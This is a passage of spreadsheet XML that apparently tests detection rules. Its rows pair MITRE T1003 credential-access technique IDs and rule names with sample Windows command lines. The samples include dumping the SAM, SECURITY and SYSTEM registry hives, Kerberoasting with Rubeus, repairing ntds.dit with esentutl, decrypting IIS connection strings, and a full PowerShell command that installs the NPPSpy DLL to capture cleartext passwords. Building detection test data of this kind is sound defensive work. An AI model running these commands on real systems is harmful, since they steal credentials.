          <t>t1003.002</t>
        </is>
      </c>
      <c r="B600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C600" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D600" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E600" s="43" t="inlineStr">
        <is>
          <t>reg save HKLM\system C:\Users\thaim\AppData\Local\Temp\system</t>
        </is>
      </c>
      <c r="F600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I600" s="43" t="n"/>
      <c r="J600" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K600" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C601" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D601" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E601" s="43" t="inlineStr">
        <is>
          <t>reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I601" s="43" t="n"/>
      <c r="J601" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B602" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C602" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D602" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E602" s="43" t="inlineStr">
        <is>
          <t>"reg" save HKLM\security\policy\secrets C:\Users\thaim\AppData\Local\Temp\secrets /y</t>
        </is>
      </c>
      <c r="F602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I602" s="43" t="n"/>
      <c r="J602" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K602" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C603" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D603" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E603" s="43" t="inlineStr">
        <is>
          <t>reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ C:\AtomicRedTeam\atomics\T1556.002\lsa_backup.reg</t>
        </is>
      </c>
      <c r="F603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I603" s="43" t="n"/>
      <c r="J603" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K603" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C604" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D604" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E604" s="43" t="inlineStr">
        <is>
          <t>reg  export HKLM\sam C:\Users\thaim\AppData\Local\Temp\sam</t>
        </is>
      </c>
      <c r="F604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I604" s="43" t="n"/>
      <c r="J604" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K604" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B605" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C605" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D605" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E605" s="43" t="inlineStr">
        <is>
          <t>reg  save HKLM\security C:\Users\thaim\AppData\Local\Temp\security</t>
        </is>
      </c>
      <c r="F605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I605" s="43" t="n"/>
      <c r="J605" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K605" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C606" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D606" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E606" s="43" t="inlineStr">
        <is>
          <t>reg  save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I606" s="43" t="n"/>
      <c r="J606" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K606" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B607" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_adding_generic_creds</t>
        </is>
      </c>
      <c r="C607" s="43" t="inlineStr">
        <is>
          <t>New Generic Credentials Added Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D607" s="43" t="inlineStr">
        <is>
          <t>b1ec66c6-f4d1-4b5c-96dd-af28ccae7727</t>
        </is>
      </c>
      <c r="E607" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\cmdkey.exe" /generic:TERMSRV/THAIMX /user:THAIMX\\thaim /pass:1password2!</t>
        </is>
      </c>
      <c r="F607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I607" s="43" t="n"/>
      <c r="J607" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K607" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_adding_generic_creds</t>
        </is>
      </c>
      <c r="C608" s="43" t="inlineStr">
        <is>
          <t>New Generic Credentials Added Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D608" s="43" t="inlineStr">
        <is>
          <t>b1ec66c6-f4d1-4b5c-96dd-af28ccae7727</t>
        </is>
      </c>
      <c r="E608" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\cmdkey.exe" -g TERMSRV/THAIMX -u THAIMX\\thaim -p 1password2!</t>
        </is>
      </c>
      <c r="F608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I608" s="43" t="n"/>
      <c r="J608" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K608" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C609" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D609" s="43" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E609" s="43" t="inlineStr">
        <is>
          <t>cmdkey.exe  /list</t>
        </is>
      </c>
      <c r="F609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I609" s="43" t="n"/>
      <c r="J609" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K609" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C610" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D610" s="43" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E610" s="43" t="inlineStr">
        <is>
          <t>"cmdkey" /list</t>
        </is>
      </c>
      <c r="F610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I610" s="43" t="n"/>
      <c r="J610" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K610" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B611" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C611" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D611" s="43" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E611" s="43" t="inlineStr">
        <is>
          <t>cmdkey  /l</t>
        </is>
      </c>
      <c r="F611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I611" s="43" t="n"/>
      <c r="J611" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K611" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C612" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D612" s="43" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E612" s="43" t="inlineStr">
        <is>
          <t>cmdkey  /L</t>
        </is>
      </c>
      <c r="F612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I612" s="43" t="n"/>
      <c r="J612" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K612" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B613" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C613" s="43" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D613" s="43" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E613" s="43" t="inlineStr">
        <is>
          <t>esentutl /p /d ntds.dit</t>
        </is>
      </c>
      <c r="F613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I613" s="43" t="n"/>
      <c r="J613" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C614" s="43" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D614" s="43" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E614" s="43" t="inlineStr">
        <is>
          <t>esentutl.exe /p /d ntds.dit</t>
        </is>
      </c>
      <c r="F614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I614" s="43" t="n"/>
      <c r="J614" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B615" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C615" s="43" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D615" s="43" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E615" s="43" t="inlineStr">
        <is>
          <t>esentutl  /p   /d ntds.dit</t>
        </is>
      </c>
      <c r="F615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I615" s="43" t="n"/>
      <c r="J615" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K615" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B616" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C616" s="43" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D616" s="43" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E616" s="43" t="inlineStr">
        <is>
          <t>esentutl /p /d C:\path\to\ntds.dit</t>
        </is>
      </c>
      <c r="F616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I616" s="43" t="n"/>
      <c r="J616" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K616" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C617" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D617" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E617" s="43" t="inlineStr">
        <is>
          <t>not_malware.exe kerberoast /outfile:C:\Windows\Temp\hashes.txt</t>
        </is>
      </c>
      <c r="F617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I617" s="43" t="n"/>
      <c r="J617" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K617" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C618" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D618" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E618" s="43" t="inlineStr">
        <is>
          <t>not_malware.exe kerberoast /outfile:pass.txt</t>
        </is>
      </c>
      <c r="F618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I618" s="43" t="n"/>
      <c r="J618" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K618" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B619" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C619" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D619" s="43" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E619" s="43" t="inlineStr">
        <is>
          <t>appcmd.exe list config /section:identity</t>
        </is>
      </c>
      <c r="F619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I619" s="43" t="n"/>
      <c r="J619" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K619" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B620" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C620" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D620" s="43" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E620" s="43" t="inlineStr">
        <is>
          <t>appcmd.exe list config -section:identity</t>
        </is>
      </c>
      <c r="F620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I620" s="43" t="n"/>
      <c r="J620" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K620" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B621" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C621" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D621" s="43" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E621" s="43" t="inlineStr">
        <is>
          <t>appcmd.exe list config /section:identity /xml</t>
        </is>
      </c>
      <c r="F621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I621" s="43" t="n"/>
      <c r="J621" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K621" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B622" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C622" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D622" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E622" s="43" t="inlineStr">
        <is>
          <t>aspnet_regiis.exe -pdf connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I622" s="43" t="n"/>
      <c r="J622" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K622" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B623" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_open_command</t>
        </is>
      </c>
      <c r="C623" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add Open Command</t>
        </is>
      </c>
      <c r="D623" s="43" t="inlineStr">
        <is>
          <t>dd3ee8cc-f751-41c9-ba53-5a32ed47e563</t>
        </is>
      </c>
      <c r="E623" s="43" t="inlineStr">
        <is>
          <t>reg add HKCU\Software\Classes\ms-settings\shell\open\command /d test /f</t>
        </is>
      </c>
      <c r="F623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I623" s="43" t="n"/>
      <c r="J623" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K623" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_open_command</t>
        </is>
      </c>
      <c r="C624" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add Open Command</t>
        </is>
      </c>
      <c r="D624" s="43" t="inlineStr">
        <is>
          <t>dd3ee8cc-f751-41c9-ba53-5a32ed47e563</t>
        </is>
      </c>
      <c r="E624" s="43" t="inlineStr">
        <is>
          <t>reg add HKCU\Software\Classes\ms-settings\shell\open\command -d test -f</t>
        </is>
      </c>
      <c r="F624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I624" s="43" t="n"/>
      <c r="J624" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B625" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C625" s="43" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D625" s="43" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E625" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item 'C:\AtomicRedTeam\atomics\..\ExternalPayloads\NPPSPY.dll' -Destination 'C:\Windows\System32'; $path = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order' -Name PROVIDERORDER; $UpdatedValue = $Path.PROVIDERORDER + ',NPPSpy'; Set-ItemProperty -Path $Path.PSPath -Name 'PROVIDERORDER' -Value $UpdatedValue; New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore | Out-Null; New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore | Out-Null; New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name 'Class' -Value 2 -ErrorAction Ignore | Out-Null; New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name 'Name' -Value NPPSpy -ErrorAction Ignore | Out-Null; New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name 'ProviderPath' -PropertyType ExpandString -Value '%SystemRoot%\System32\NPPSPY.dll' -ErrorAction Ignore | Out-Null; Write-Output '[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt'"</t>
        </is>
      </c>
      <c r="F625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I625" s="43" t="n"/>
      <c r="J625" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B626" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C626" s="43" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D626" s="43" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E626" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\SYSTEM\CurrentControlSet\Services\MyProvider /v NetworkProvider /t REG_SZ /d malicious.dll /f</t>
        </is>
      </c>
      <c r="F626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="43" t="n"/>
      <c r="J626" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K626" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rpcping_credential_capture</t>
        </is>
      </c>
      <c r="C627" s="43" t="inlineStr">
        <is>
          <t>Capture Credentials with Rpcping.exe</t>
        </is>
      </c>
      <c r="D627" s="43" t="inlineStr">
        <is>
          <t>93671f99-04eb-4ab4-a161-70d446a84003</t>
